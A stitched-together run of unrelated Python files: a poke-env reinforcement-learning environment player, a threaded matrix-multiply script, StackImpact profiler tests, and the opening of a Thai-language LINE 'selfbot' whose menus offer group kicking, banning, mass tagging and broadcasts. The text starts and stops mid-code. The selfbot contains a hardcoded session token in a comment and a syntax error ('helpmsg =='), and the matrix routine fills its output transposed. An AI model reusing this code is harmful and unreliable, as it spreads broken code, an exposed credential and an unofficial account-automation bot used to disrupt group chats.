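        conn.run('ls', hide=True)              # raises if it still is not reachable
    conn.put(local_zip, remote_dir)            # transfer the file over SFTP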
env_player.py
# -*- coding: utf-8 -*- """This module defines a player class exposing the Open AI Gym API. """ from abc import ABC, abstractmethod, abstractproperty from gym.core import Env # pyre-ignore from queue import Queue from threading import Thread from typing import Any, Callable, List, Optional, Tuple, Union from poke_env.environment.battle import Battle from poke_env.player.player import Player from poke_env.player_configuration import PlayerConfiguration from poke_env.server_configuration import ServerConfiguration from poke_env.teambuilder.teambuilder import Teambuilder from poke_env.utils import to_id_str import asyncio import numpy as np # pyre-ignore import time class EnvPlayer(Player, Env, ABC): # pyre-ignore """Player exposing the Open AI Gym Env API. Recommended use is with play_against.""" _ACTION_SPACE = None MAX_BATTLE_SWITCH_RETRY = 10000 PAUSE_BETWEEN_RETRIES = 0.001 def __init__( self, player_configuration: Optional[PlayerConfiguration] = None, *, avatar: Optional[int] = None, battle_format: str = "gen8randombattle", log_level: Optional[int] = None, server_configuration: Optional[ServerConfiguration] = None, start_listening: bool = True, team: Optional[Union[str, Teambuilder]] = None, ): """ :param player_configuration: Player configuration. If empty, defaults to an automatically generated username with no password. This option must be set if the server configuration requires authentication. :type player_configuration: PlayerConfiguration, optional :param avatar: Player avatar id. Optional. :type avatar: int, optional :param battle_format: Name of the battle format this player plays. Defaults to gen8randombattle. :type battle_format: str :param log_level: The player's logger level. :type log_level: int. Defaults to logging's default level. :param server_configuration: Server configuration. Defaults to Localhost Server Configuration. :type server_configuration: ServerConfiguration, optional :param start_listening: Wheter to start listening to the server. Defaults to True. :type start_listening: bool :param team: The team to use for formats requiring a team. Can be a showdown team string, a showdown packed team string, of a ShowdownTeam object. Defaults to None. :type team: str or Teambuilder, optional """ super(EnvPlayer, self).__init__( player_configuration=player_configuration, avatar=avatar, battle_format=battle_format, log_level=log_level, max_concurrent_battles=1, server_configuration=server_configuration, start_listening=start_listening, team=team, ) self._actions = {} self._current_battle: Battle self._observations = {} self._reward_buffer = {} self._start_new_battle = False @abstractmethod def _action_to_move(self, action: int, battle: Battle) -> str: """Abstract method converting elements of the action space to move orders.""" async def _battle_finished_callback(self, battle: Battle) -> None: self._observations[battle].put(self.embed_battle(battle)) def _init_battle(self, battle: Battle) -> None: self._observations[battle] = Queue() self._actions[battle] = Queue() def choose_move(self, battle: Battle) -> str: if battle not in self._observations or battle not in self._actions: self._init_battle(battle) self._observations[battle].put(self.embed_battle(battle)) action = self._actions[battle].get() return self._action_to_move(action, battle) def close(self) -> None: """Unimplemented. 
Has no effect.""" def complete_current_battle(self) -> None: """Completes the current battle by performing random moves.""" done = self._current_battle.finished while not done: _, _, done, _ = self.step(np.random.choice(self._ACTION_SPACE)) def compute_reward(self, battle: Battle) -> float: """Returns a reward for the given battle. The default implementation corresponds to the default parameters of the reward_computing_helper method. :param battle: The battle for which to compute the reward. :type battle: Battle :return: The computed reward. :rtype: float """ return self.reward_computing_helper(battle) @abstractmethod def embed_battle(self, battle: Battle) -> Any: """Abstract method for embedding battles. :param battle: The battle whose state is being embedded :type battle: Battle :return: The computed embedding :rtype: Any """ def reset(self) -> Any: """Resets the internal environment state. The current battle will be set to an active unfinished battle. :return: The observation of the new current battle. :rtype: Any :raies: EnvironmentError """ for _ in range(self.MAX_BATTLE_SWITCH_RETRY): battles = dict(self._actions.items()) battles = [b for b in battles if not b.finished] if battles: self._current_battle = battles[0] observation = self._observations[self._current_battle].get() return observation time.sleep(self.PAUSE_BETWEEN_RETRIES) else: raise EnvironmentError("User %s has no active battle." % self.username) def render(self, mode="human") -> None: """A one line rendering of the current state of the battle.""" print( " Turn %4d. | [%s][%3d/%3dhp] %10.10s - %10.10s [%3d%%hp][%s]" % ( self._current_battle.turn, "".join( [ "⦻" if mon.fainted else "●" for mon in self._current_battle.team.values() ] ), self._current_battle.active_pokemon.current_hp or 0, self._current_battle.active_pokemon.max_hp or 0, self._current_battle.active_pokemon.species, self._current_battle.opponent_active_pokemon.species, # pyre-ignore self._current_battle.opponent_active_pokemon.current_hp # pyre-ignore or 0, "".join( [ "⦻" if mon.fainted else "●" for mon in self._current_battle.opponent_team.values() ] ), ), end="\n" if self._current_battle.finished else "\r", ) def reward_computing_helper( self, battle: Battle, *, fainted_value: float = 0.0, hp_value: float = 0.0, number_of_pokemons: int = 6, starting_value: float = 0.0, status_value: float = 0.0, victory_value: float = 1.0, ) -> float: """A helper function to compute rewards. The reward is computed by computing the value of a game state, and by comparing it to the last state. State values are computed by weighting different factor. Fainted pokemons, their remaining HP, inflicted statuses and winning are taken into account. For instance, if the last time this function was called for battle A it had a state value of 8 and this call leads to a value of 9, the returned reward will be 9 - 8 = 1. Consider a single battle where each player has 6 pokemons. No opponent pokemon has fainted, but our team has one fainted pokemon. Three opposing pokemons are burned. We have one pokemon missing half of its HP, and our fainted pokemon has no HP left. The value of this state will be: - With fainted value: 1, status value: 0.5, hp value: 1: = - 1 (fainted) + 3 * 0.5 (status) - 1.5 (our hp) = -1 - With fainted value: 3, status value: 0, hp value: 1: = - 3 + 3 * 0 - 1.5 = -4.5 :param battle: The battle for which to compute rewards. :type battle: Battle :param fainted_value: The reward weight for fainted pokemons. Defaults to 0. 
:type fainted_value: float :param hp_value: The reward weight for hp per pokemon. Defaults to 0. :type hp_value: float :param number_of_pokemons: The number of pokemons per team. Defaults to 6. :type number_of_pokemons: int :param starting_value: The default reference value evaluation. Defaults to 0. :type starting_value: float :param status_value: The reward value per non-fainted status. Defaults to 0. :type status_value: float :param victory_value: The reward value for winning. Defaults to 1. :type victory_value: float :return: The reward. :rtype: float """ if battle not in self._reward_buffer: self._reward_buffer[battle] = starting_value current_value = 0 for mon in battle.team.values(): current_value += mon.current_hp_fraction * hp_value if mon.fainted: current_value -= fainted_value elif mon.status is not None: current_value -= status_value current_value += (number_of_pokemons - len(battle.team)) * hp_value for mon in battle.opponent_team.values(): current_value -= mon.current_hp_fraction * hp_value if mon.fainted: current_value += fainted_value elif mon.status is not None: current_value += status_value current_value -= (number_of_pokemons - len(battle.opponent_team)) * hp_value if battle.won: current_value += victory_value elif battle.lost: current_value -= victory_value to_return = current_value - self._reward_buffer[battle] self._reward_buffer[battle] = current_value return to_return def seed(self, seed=None) -> None: """Sets the numpy seed.""" np.random.seed(seed) def step(self, action: int) -> Tuple: """Performs action in the current battle. :param action: The action to perform. :type action: int :return: A tuple containing the next observation, the reward, a boolean indicating wheter the episode is finished, and additional information :rtype: tuple """ if self._current_battle.finished: observation = self.reset() else: self._actions[self._current_battle].put(action) observation = self._observations[self._current_battle].get() return ( observation, self.compute_reward(self._current_battle), self._current_battle.finished, {}, ) def play_against( self, env_algorithm: Callable, opponent: Player, env_algorithm_kwargs=None ): """Executes a function controlling the player while facing opponent. The env_algorithm function is executed with the player environment as first argument. It exposes the open ai gym API. Additional arguments can be passed to the env_algorithm function with env_algorithm_kwargs. Battles against opponent will be launched as long as env_algorithm is running. When env_algorithm returns, the current active battle will be finished randomly if it is not already. :param env_algorithm: A function that controls the player. It must accept the player as first argument. Additional arguments can be passed with the env_algorithm_kwargs argument. :type env_algorithm: callable :param opponent: A player against with the env player will player. :type opponent: Player :param env_algorithm_kwargs: Optional arguments to pass to the env_algorithm. Defaults to None. 
""" self._start_new_battle = True async def launch_battles(player: EnvPlayer, opponent: Player): if opponent is not None: battles_coroutine = asyncio.gather( player.send_challenges( opponent=to_id_str(opponent.username), n_challenges=1, to_wait=opponent.logged_in, ), opponent.accept_challenges( opponent=to_id_str(player.username), n_challenges=1 ), ) else: battles_coroutine = asyncio.gather(player.ladder(n_games=1)) await battles_coroutine def env_algorithm_wrapper(player, kwargs): env_algorithm(player, **kwargs) player._start_new_battle = False while True: try: player.complete_current_battle() player.reset() except OSError: break loop = asyncio.get_event_loop() if env_algorithm_kwargs is None: env_algorithm_kwargs = {} thread = Thread( target=lambda: env_algorithm_wrapper(self, env_algorithm_kwargs) ) thread.start() while self._start_new_battle: loop.run_until_complete(launch_battles(self, opponent)) thread.join() @abstractproperty def action_space(self) -> List: """Returns the action space of the player. Must be implemented by subclasses.""" pass class Gen7EnvSinglePlayer(EnvPlayer): # pyre-ignore _ACTION_SPACE = list(range(3 * 4 + 6)) def _action_to_move(self, action: int, battle: Battle) -> str: """Converts actions to move orders. The conversion is done as follows: 0 <= action < 4: The actionth available move in battle.available_moves is executed. 4 <= action < 8: The action - 4th available move in battle.available_moves is executed, with z-move. 8 <= action < 12: The action - 8th available move in battle.available_moves is executed, with mega-evolution. 12 <= action < 18 The action - 12th available switch in battle.available_switches is executed. If the proposed action is illegal, a random legal move is performed. :param action: The action to convert. :type action: int :param battle: The battle in which to act. :type battle: Battle :return: the order to send to the server. :rtype: str """ if ( action < 4 and action < len(battle.available_moves) and not battle.force_switch ): return self.create_order(battle.available_moves[action]) elif ( not battle.force_switch and battle.can_z_move and 0 <= action - 4 < len(battle.active_pokemon.available_z_moves) ): return self.create_order( battle.active_pokemon.available_z_moves[action - 4], z_move=True ) elif ( battle.can_mega_evolve and 0 <= action - 8 < len(battle.available_moves) and not battle.force_switch ): return self.create_order(battle.available_moves[action - 8], mega=True) elif 0 <= action - 12 < len(battle.available_switches): return self.create_order(battle.available_switches[action - 12]) else: return self.choose_random_move(battle) @property def action_space(self) -> List: """The action space for gen 7 single battles. The conversion to moves is done as follows: 0 <= action < 4: The actionth available move in battle.available_moves is executed. 4 <= action < 8: The action - 4th available move in battle.available_moves is executed, with z-move. 8 <= action < 12: The action - 8th available move in battle.available_moves is executed, with mega-evolution. 12 <= action < 18 The action - 12th available switch in battle.available_switches is executed. """ return self._ACTION_SPACE class Gen8EnvSinglePlayer(EnvPlayer): # pyre-ignore _ACTION_SPACE = list(range(4 * 4 + 6)) def _action_to_move(self, action: int, battle: Battle) -> str: """Converts actions to move orders. The conversion is done as follows: 0 <= action < 4: The actionth available move in battle.available_moves is executed. 
4 <= action < 8: The action - 4th available move in battle.available_moves is executed, with z-move. 8 <= action < 12: The action - 8th available move in battle.available_moves is executed, with mega-evolution. 8 <= action < 12: The action - 8th available move in battle.available_moves is executed, with mega-evolution. 12 <= action < 16: The action - 12th available move in battle.available_moves is executed, while dynamaxing. 16 <= action < 22 The action - 16th available switch in battle.available_switches is executed. If the proposed action is illegal, a random legal move is performed. :param action: The action to convert. :type action: int :param battle: The battle in which to act. :type battle: Battle :return: the order to send to the server. :rtype: str """ if ( action < 4 and action < len(battle.available_moves) and not battle.force_switch ): return self.create_order(battle.available_moves[action]) elif ( not battle.force_switch and battle.can_z_move and 0 <= action - 4 < len(battle.active_pokemon.available_z_moves) ): return self.create_order( battle.active_pokemon.available_z_moves[action - 4], z_move=True ) elif ( battle.can_mega_evolve and 0 <= action - 8 < len(battle.available_moves) and not battle.force_switch ): return self.create_order(battle.available_moves[action - 8], mega=True) elif ( battle.can_dynamax and 0 <= action - 12 < len(battle.available_moves) and not battle.force_switch ): return self.create_order(battle.available_moves[action - 12], dynamax=True) elif 0 <= action - 16 < len(battle.available_switches): return self.create_order(battle.available_switches[action - 16]) else: return self.choose_random_move(battle) @property def action_space(self) -> List: """The action space for gen 7 single battles. The conversion to moves is done as follows: 0 <= action < 4: The actionth available move in battle.available_moves is executed. 4 <= action < 8: The action - 4th available move in battle.available_moves is executed, with z-move. 8 <= action < 12: The action - 8th available move in battle.available_moves is executed, with mega-evolution. 12 <= action < 16: The action - 12th available move in battle.available_moves is executed, while dynamaxing. 16 <= action < 22 The action - 16th available switch in battle.available_switches is executed. """ return self._ACTION_SPACE
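# A minimal usage sketch of the Gym-style API defined above: a concrete
# Gen8EnvSinglePlayer with a deliberately crude embedding, driven by random
# actions through play_against. RandomPlayer is assumed to be importable from
# poke_env.player.random_player in this version of poke-env; the driver lines
# are left commented out because they require a running Showdown server.
import numpy as np

from poke_env.player.random_player import RandomPlayer


class SimpleRLPlayer(Gen8EnvSinglePlayer):
    def embed_battle(self, battle):
        # Crude embedding: counts of non-fainted pokemons on each side.
        ours = len([m for m in battle.team.values() if not m.fainted])
        theirs = len([m for m in battle.opponent_team.values() if not m.fainted])
        return np.array([ours, theirs])

    def compute_reward(self, battle) -> float:
        return self.reward_computing_helper(
            battle, fainted_value=2, victory_value=30
        )


def random_rollouts(player, n_steps=100):
    player.reset()
    for _ in range(n_steps):
        action = np.random.choice(player.action_space)
        _, reward, done, _ = player.step(action)
        if done:
            player.reset()


# env_player = SimpleRLPlayer(battle_format="gen8randombattle")
# env_player.play_against(env_algorithm=random_rollouts, opponent=RandomPlayer())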
method.py
import threading

# def matmult(a, b):
#     zip_b = zip(*b)
#     out = [[sum(ele_a*ele_b for ele_a, ele_b in zip(row_a, col_b))
#             for col_b in zip_b] for row_a in a]
#     # for ele_a, ele_b in zip(row_a, col_b)
#     return out


def mult(w, a, i, j, o):
    # Dot product of row i of w with column j of a; the result is stored at
    # o[j][i], i.e. the output matrix is filled in transposed order.
    total = 0
    for k in range(len(w[0])):
        # print("w:{}, a:{}".format(w[i][k], a[k][j]))
        total += (w[i][k] * a[k][j])
    o[j][i] = total


def matmult2(w, a):
    # Multiply w by a, computing each output cell in its own thread.
    rows_W = len(w)
    cols_W = len(w[0])
    rows_A = len(a)
    cols_A = len(a[0])
    # print("a.r:{}".format(rows_A))
    # print("a.c:{}".format(cols_A))
    # print("w.r:{}".format(rows_W))
    # print("w.c:{}".format(cols_W))
    output = [[0 for row in range(rows_W)] for col in range(cols_A)]
    # print output
    threads = []
    for i in range(rows_W):
        for j in range(cols_A):
            th = threading.Thread(target=mult, args=(w, a, i, j, output))
            th.start()
            threads.append(th)
    for th in threads:
        th.join()  # join() must be called; a bare `th.join` does nothing
    return output

# x = [[1],[2],[3],[4],[5],[6],[7],[8],[9],[10]]
# y = [[1,2,3,4,5],[2,3,4,5,6],[3,4,5,6,7],[4,5,6,7,8],[5,6,7,8,9],[6,7,8,9,10],[7,8,9,10,11],[8,9,10,11,12],[9,10,11,12,13],[10,11,12,13,14]]
# import numpy as np  # I want to check my solution with numpy
# from time import time
# mx = np.matrix(x)
# my = np.matrix(y)
# start = time()
# z = matmult2(x, y)
# time_par = time() - start
# print('rfunc: {:.2f} seconds taken'.format(time_par))
# print(z)
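# A small usage check for matmult2 (an addition, not part of the original
# file). Note that, as written, mult() stores each dot product at o[j][i], so
# matmult2 returns the transpose of the conventional row-by-column product.
if __name__ == '__main__':
    w = [[1, 2],
         [3, 4]]
    a = [[5, 6],
         [7, 8]]
    result = matmult2(w, a)
    # The conventional product w.a is [[19, 22], [43, 50]];
    # matmult2 returns its transpose: [[19, 43], [22, 50]].
    print(result)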
agent_test.py
import unittest import sys import threading import random import time import stackimpact from stackimpact.runtime import runtime_info, min_version # python3 -m unittest discover -v -s tests -p *_test.py class AgentTestCase(unittest.TestCase): def test_run_in_main_thread(self): if runtime_info.OS_WIN: return stackimpact._agent = None agent = stackimpact.start( dashboard_address = 'http://localhost:5001', agent_key = 'key1', app_name = 'TestPythonApp', debug = True ) result = {} def _run(): result['thread_id'] = threading.current_thread().ident def _thread(): agent.run_in_main_thread(_run) t = threading.Thread(target=_thread) t.start() t.join() self.assertEqual(result['thread_id'], threading.current_thread().ident) agent.destroy() def test_profile(self): if runtime_info.OS_WIN: return stackimpact._agent = None agent = stackimpact.start( dashboard_address = 'http://localhost:5001', agent_key = 'key1', app_name = 'TestPythonApp', debug = True ) agent.cpu_reporter.start() span = agent.profile() for i in range(0, 2000000): random.randint(1, 1000000) span.stop() agent.cpu_reporter.report() self.assertTrue('test_profile' in str(agent.message_queue.queue)) agent.destroy() def test_with_profile(self): if runtime_info.OS_WIN: return stackimpact._agent = None agent = stackimpact.start( dashboard_address = 'http://localhost:5001', agent_key = 'key1', app_name = 'TestPythonApp', debug = True ) agent.cpu_reporter.start() with agent.profile(): for i in range(0, 2000000): random.randint(1, 1000000) agent.cpu_reporter.report() self.assertTrue('test_with_profile' in str(agent.message_queue.queue)) agent.destroy() def test_cpu_profile(self): stackimpact._agent = None agent = stackimpact.start( dashboard_address = 'http://localhost:5001', agent_key = 'key1', app_name = 'TestPythonApp', auto_profiling = False, debug = True ) messages = [] def add_mock(topic, message): messages.append(message) agent.message_queue.add = add_mock agent.start_cpu_profiler() for j in range(0, 2000000): random.randint(1, 1000000) agent.stop_cpu_profiler() self.assertTrue('test_cpu_profile' in str(messages)) agent.destroy() def test_allocation_profile(self): if runtime_info.OS_WIN or not min_version(3, 4): return stackimpact._agent = None agent = stackimpact.start( dashboard_address = 'http://localhost:5001', agent_key = 'key1', app_name = 'TestPythonApp', auto_profiling = False, debug = True ) messages = [] def add_mock(topic, message): messages.append(message) agent.message_queue.add = add_mock agent.start_allocation_profiler() mem1 = [] for i in range(0, 1000): obj1 = {'v': random.randint(0, 1000000)} mem1.append(obj1) agent.stop_allocation_profiler() self.assertTrue('agent_test.py' in str(messages)) agent.destroy() def test_block_profile(self): if runtime_info.OS_WIN or not min_version(3, 4): return stackimpact._agent = None agent = stackimpact.start( dashboard_address = 'http://localhost:5001', agent_key = 'key1', app_name = 'TestPythonApp', auto_profiling = False, debug = True ) messages = [] def add_mock(topic, message): messages.append(message) agent.message_queue.add = add_mock agent.start_block_profiler() def blocking_call(): time.sleep(0.1) for i in range(5): blocking_call() agent.stop_block_profiler() self.assertTrue('blocking_call' in str(messages)) agent.destroy() if __name__ == '__main__': unittest.main()
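# A minimal usage sketch of the agent API exercised by the tests above. The
# dashboard address, agent key and app name are placeholders; agent.profile()
# is used as a context manager exactly as in test_with_profile.
import random

import stackimpact

agent = stackimpact.start(
    dashboard_address='http://localhost:5001',
    agent_key='key1',
    app_name='ExampleApp',
    debug=True)

# Record a manually delimited profiling span around a CPU-heavy section.
with agent.profile():
    for _ in range(1000000):
        random.randint(1, 1000000)

agent.destroy()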
Redsb1.1.py
# -*- coding: utf-8 -*- import LINETCR from LINETCR.lib.curve.ttypes import * from datetime import datetime import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, wikipedia, tempfile from bs4 import BeautifulSoup from urllib import urlopen from Helper.main import qr import requests from io import StringIO from threading import Thread from gtts import gTTS from googletrans import Translator #JANGAN LUPA => sudo pip install bs4 => sudo pip install BeautifulSoup => sudo pip install urllib => sudo pip install requests => sudo pip install gTTS #cl = LINETCR.LINE() #cl.login(token="ErHsHG58lvVUFDtEIDp6.Lkg8ohUsFOz1yZrKJtfpHG.LfmpMPXz95AxfZccyyYzAhO9QmXF/jRBX+9PSsq8g/I=") #cl.loginResult() cl = LINETCR.LINE() cl.login(token=qr().get()) cl.loginResult() print "\n[ ลอคอินRedselfbotสำเร็จแล้ว ]" reload(sys) sys.setdefaultencoding('utf-8') helpmsg =="""╔══════════════════ ║ 🌾RED BOT LINE THAILAND🌾 ║ ─┅═✥👊ᵀᴴᴬᴵᴸᴬᴺᴰ👊✥═┅─ ║ 💀[RED SAMURI BOT]💀 ╠══════════════════ ║ ─┅═✥🌿คำสั่ง ทั่วไป🌿✥═┅─ ╠══════════════════ ╠❂➣ [Id]ไอดีเรา ╠❂➣ [Mid] เอาเอมไอดีเรา ╠❂➣ [Me] ส่งคทตัวเอง ╠❂➣ [TL 「Text」โพสบนทามไลน์ ╠❂➣ [MyName]เปลี่ยนชื่อ ╠❂➣ [Gift] สงของขวัญ ╠❂➣ [Mid 「mid」 ╠❂➣ [Group id] ╠❂➣ [Group cancel] ╠❂➣ [album 「id」] ╠❂➣ [Hapus album 「id」 ╠❂➣ [เปิดคท] เปิด คท ╠❂➣ [ปิดคท] ปิด คท ╠❂➣ [เปิดเข้า] เปิดเข้าห้องอัตโมัติ ╠❂➣ [ปิดเข้า] ปิดเข้าห้องอัตโมัติ ╠❂➣ [Group cancel] ลบรัน ╠❂➣ [เปิดออก] เปิดไม่เข้าแชทรวม ╠❂➣ [ปิดออก] เข้าแชทรวม ╠❂➣ [เปิดแอด/ปิดแอด] เปิด/ปิดรับเพื่อน ╠❂➣ [Jam on]] เปิดชื่อนาฬิกา ╠❂➣ [Jam off] ปิดชื่อนาฬิกา ╠❂➣ [red say ] ส่งข้อความ ╠❂➣ [Up] อัพเดชชื่อ ╠❂➣ [Ban:on] เปิดสั่งแบน ╠❂➣ [Unban:on] เปิดแก้แบน ╠❂➣ [Banlist] เช็ครายชื่อโดนแบน ╠❂➣ [เปิดเม้น] เปิดคอมเม้น ╠❂➣ [ปิดเม้น] ปิดคอมเม้น ╠❂➣ [Com set:] ตั้งค่าคอมเม้น ╠❂➣ [Mcheck] เช็คแบน ╠❂➣ [Conban,Contactban] ส่งคท คนโดนแบน ╠❂➣ [Cb] ╠❂➣ [Clear ban] ล้างแบน ╠❂➣ [พูด ] สั่งเซลพูด ╠❂➣ [Message Confirmation] ยืนยันข้อความ ╠❂➣ [Mybio: 「Iตัส] เปลี่บนตัส ╠❂➣ [Key] ╠══════════════════ ║─┅═✥🌿คำสั่งในกลุ่ม🌿✥═┅─ ╠══════════════════ ╠❂➣ [Red on/off] ╠❂➣ [เปิดลิ้ง]เปิดกันลิ้ง ╠❂➣ [ปิดลิ้ง]ปิดกันลิ้ง ╠❂➣ [Invite「mid」] เชิญด้วยmid ╠❂➣ [Kmid: ] สั่งเตะด้วยmid ╠❂➣ [Ginfo] สถานะห้อง ╠❂➣ [Cancel] ลบค้างเชิญ ╠❂➣ [Gn 「ชื่อห้อง」เปลี่ยนชื่อห้อง ╠❂➣ [Gurl] ขอลิ้งห้อง ╠❂➣ [gurl「kelompok ID] ╠══════════════════ ║ ─┅═✥🌿คำสั่งสายมาร🌿✥═┅─ ╠══════════════════ ╠❂➣ [Mcheck] เช็คคนติดดำทั้งหมด ╠❂➣ [Banlist]เช๊คคนติดดำในห้อง ╠❂➣ [Unbam @] แก้ดำ ใส่@text ╠❂➣ [หวัดดี @] หยอกเตะแล้วดึงกลับ ╠❂➣ [หวด @] เซลเตะ ╠❂➣ [Ban:]สั่งดำ mid ╠❂➣ [Unban:] ล้างดำ mid ╠❂➣ [เปิดกัน] เปิดป้องกัน ╠❂➣ [เปิดลิ้ง/ปิดลิ้ง] เปิด/ปิดกันลิ้ง ╠❂➣ [กันเชิญ] เปิดกันเชิญ ╠❂➣ [Cancel on] เปิดกันลบค้างเชิญ ╠══════════════════ ║─┅═✥🌿คำสั่งสายขาว🌿✥═┅─ ╠══════════════════ ╠❂➣ [Copy @] ก๊อปโปรไฟล์ ╠❂➣ [Kembali] กลับคืนร่าง ╠❂➣ [ส่องรูป @] ดูรูปปนะจำตัว ╠❂➣ [ส่องปก @] ดูรูปปก ╠❂➣ [จับ] ต้้งค่าคนอ่าน ╠❂➣ [อ่าน] ดูคนอ่าน ╠❂➣ [เปิดอ่าน] เปิดการอ่าน ╠❂➣ [ปิดอ่าน] ปิดการอ่าน ╠❂➣ [อ่าน] ดูคนอ่าน ╠❂➣ [ใครแทค] แทกชื่อสมาชิก ╠❂➣ [tag all] ╠❂➣ [ยกเลิกเชิญ] ลบค้างเชิญ ╠❂➣ [Gbroadcast] ประกาศกลุ่ม ╠❂➣ [Cbroadcast] ประกาศแชท ╠❂➣ [siri (ใส่ข้อความ)] ╠❂➣ [siri: (ใส่ข้อความ)] ╠══════════════════ ║•─✯͜͡ ✯RED★SAMURI★SELFBOT✯͜͡ ✯─• ╠══════════════════ ╠http//:line.me/ti/p/~samuri5 ╚══════════════════ """ helpMessage2 ="""╔══════════════════ ║ 🎀✨คำสั่งใช้ลบรัน✨🎀 ╠══════════════════ ║✰ลบรัน ➠เซลบอทลบรัน ║✰ลบแชท ➠เซลบอทลบแชต ╔══════════════════ ║ ✦เปิด/ปิดข้อความต้อนรับ✦ ╠══════════════════ ║✰ Thx1 on ➠เปิดข้อความต้อนรับ ║✰ Thx1 off ➠ปิดข้อความต้อนรับ ║✰ Thx2 on 
➠เปิดข้อความออกกลุ่ม ║✰ Thx2 off ➠เปิดข้อความออกกลุ่ม ║✰ Thx3 on ➠เปิดข้อความคนลบ ║✰ Thx3 off ➠เปิดข้อความคนลบ ║✰ Mbot on ➠เปิดเเจ้งเตือนบอท ║✰ Mbot off ➠ปิดเเจ้งเตือนบอท ║✰ M on ➠เปิดเเจ้งเตือนตนเอง ║✰ M off ➠ปิดเเจ้งเตือนตนเอง ║✰ Tag on ➠เปิดกล่าวถึงเเท็ค ║✰ Tag off ➠ปิดกล่าวถึงเเท็ค ║✰ Kicktag on ➠เปิดเตะคนเเท็ค ║✰ Kicktag off ➠ปิดเตะคนเเท็ค ╠══════════════════ ║ ⌚โหมดตั้งค่าข้อความ⌚ ╠══════════════════ ║✰ Thx1˓: ➠ไส่ข้อความต้อนรับ ║✰ Thx2˓: ➠ไส่ข้อความออกจากกลุ่ม ║✰ Thx3˓: ➠ไส่ข้อความเมื่อมีคนลบ ╠══════════════════ ║✰ Thx1 ➠เช็คข้อความต้อนรับ ║✰ Thx2 ➠เช็คข้อความคนออก ║✰ Thx3 ➠เช็คข้อความคนลบ ╠═════════════════ ║ ─┅═✥ᵀᴴᴬᴵᴸᴬᴺᴰ✥═┅─ ║ •─✯͜͡ ✯RED★SAMURI★SELFBOT✯͜͡ ✯─• 「OR」\n╠-> help1\n╠-> help2\n╠-> help3\n╠-> help4\n╠-> help5 ╠══════════════════ """ helppro =""" ╠══════════════════ ╠❂➣ [Read on/off][เปิด/ปิดระบบป้องกันทั้งหมด] ╠❂➣ [เปิดลิ้ง/ปิดลิ้ง] ╠❂➣ [กันเชิญ/ปิดกันเชิญ] ╠❂➣ [กันยก/ปิดกันยก] ╠❂➣ [เปิดกัน/ปิดกัน] ╠❂➣ [ออก:][จำนวนกลุ่มที่จะปฏิเสธ] ╠❂➣ [ออก:off] ปิดปฏิเสธการเชิญเข้ากลุ่ม ╠❂➣ ╠══════════════════ ║•─✯͜͡ ✯RED★SAMURI★SELFBOT✯͜͡ ✯─• ╠══════════════════ ╠http//:line.me/ti/p/~samuri5 ╚══════════════════""" helpself =""" ╠══════════════════ ║─┅═✥🌿คำสั่งสายขาว🌿✥═┅─ ╠══════════════════ ╠❂➣ [Copy @] ก๊อปโปรไฟล์ ╠❂➣ [Kembali] กลับคืนร่าง ╠❂➣ [ส่องรูป @] ดูรูปปนะจำตัว ╠❂➣ [ส่องปก @] ดูรูปปก ╠❂➣ [จับ] ต้้งค่าคนอ่าน ╠❂➣ [อ่าน] ดูคนอ่าน ╠❂➣ [เปิดอ่าน] เปิดการอ่าน ╠❂➣ [ปิดอ่าน] ปิดการอ่าน ╠❂➣ [อ่าน] ดูคนอ่าน ╠❂➣ [ใครแทค] แทกชื่อสมาชิก ╠❂➣ [Sider on/off][จับคนอ่านแบบเรียงตัว] ╠❂➣ [ยกเลิกเชิญ] ลบค้างเชิญ ╠❂➣ [Gbroadcast] ประกาศกลุ่ม ╠❂➣ [Cbroadcast] ประกาศแชท ╠❂➣ [siri (ใส่ข้อความ)] ╠❂➣ [siri: (ใส่ข้อความ)] ╠══════════════════ ║•─✯͜͡ ✯RED★SAMURI★SELFBOT✯͜͡ ✯─• ╠══════════════════ ╠http//:line.me/ti/p/~samuri5 ╚══════════════════ """ helpset =""" ╠══════════════════ ╠❂➣ [เช็ค1][] ╠❂➣ [เช็ค2][] ╠❂➣ [เปิดแชร์/ปิดแชร์][] ╠❂➣ [เปิดเม้น/ปิดเม้น][] ╠❂➣ [เปิดคท/ปิดคท][] ╠❂➣ [เปิดเข้า/ปิดเข้า][] ╠❂➣ [เปิดออก/ปิดออก][] ╠❂➣ [เปิดแอด/ปิดแอด][] ╠❂➣ [เปิดไลค์/ปิดไลค์][] ╠❂➣ [like friend][] ╠❂➣ [respon on/off][] ╠❂➣ [read on/off][] ╠❂➣ [simisimi on/off][] ╠❂➣ [Kicktag on/off][] ╠❂➣ ╠══════════════════ ║•─✯͜͡ ✯RED★SAMURI★SELFBOT✯͜͡ ✯─• ╠══════════════════ ╠http//:line.me/ti/p/~samuri5 ╚══════════════════""" helpgrup =""" ╠══════════════════ ╠❂➣ [Url][ขอลื้งกลุ่ม] ╠❂➣ [Cancel][ยกค้างเชิญ] ╠❂➣ [Gcreator][ผู้สร้างกลุ่ม] ╠❂➣ [Gname:][เปลี่ยนชื่อกลุ่ม] ╠❂➣ [Infogrup][ดูข้อมูลกลุ่ม] ╠❂➣ [Gruplist][ดูรูปกลุ่ม] ╠❂➣ [ออก:][+จำนวนกลุ่มที่จะปฏิเสธ] ╠❂➣ [ออก:off][ปิดปฏิเสธการเชิญเข้ากลุ่ม] ╠❂➣ [playstore (text)][เซิร์ในเพลสโต] ╠❂➣ [Profileig (username)] ╠❂➣ [wikipedia (text)][เซิร์ทในเว็บ] ╠❂➣ [idline (text)][เชิร์ทไอดีไลน์] ╠❂➣ [ytsearch (text)][เซิรทในยูทูป] ╠❂➣ [Time][ดูเวลา] ╠❂➣ [lirik (text)] ╠══════════════════ ║•─✯͜͡ ✯RED★SAMURI★SELFBOT✯͜͡ ✯─• ╠══════════════════ ╠http//:line.me/ti/p/~samuri5 ╚══════════════════""" helptranslate =""" ╠══════════════════ ╠❂➣ [Id @en] ╠❂➣ [En @id] ╠❂➣ [Id @jp] ╠❂➣ [Jp @id] ╠❂➣ [Id @th] ╠❂➣ [Th @id] ╠❂➣ [Id @ar] ╠❂➣ [Ar @id] ╠❂➣ [Id @ko] ╠❂➣ [Ko @id] ╠❂➣ [Say-id] ╠❂➣ [Say-en] ╠❂➣ [Say-jp] ╠❂➣ [พูด ][ข้อความ] ╠══════════════════ ║•─✯͜͡ ✯RED★SAMURI★SELFBOT✯͜͡ ✯─• ╠══════════════════ ╠http//:line.me/ti/p/~samuri5 ╚══════════════════""" helpThx ="""╔══════════════════ ║ 🎀✨คำสั่งใช้ลบรัน✨🎀 ╠══════════════════ ║✰ลบรัน ➠เซลบอทลบรัน 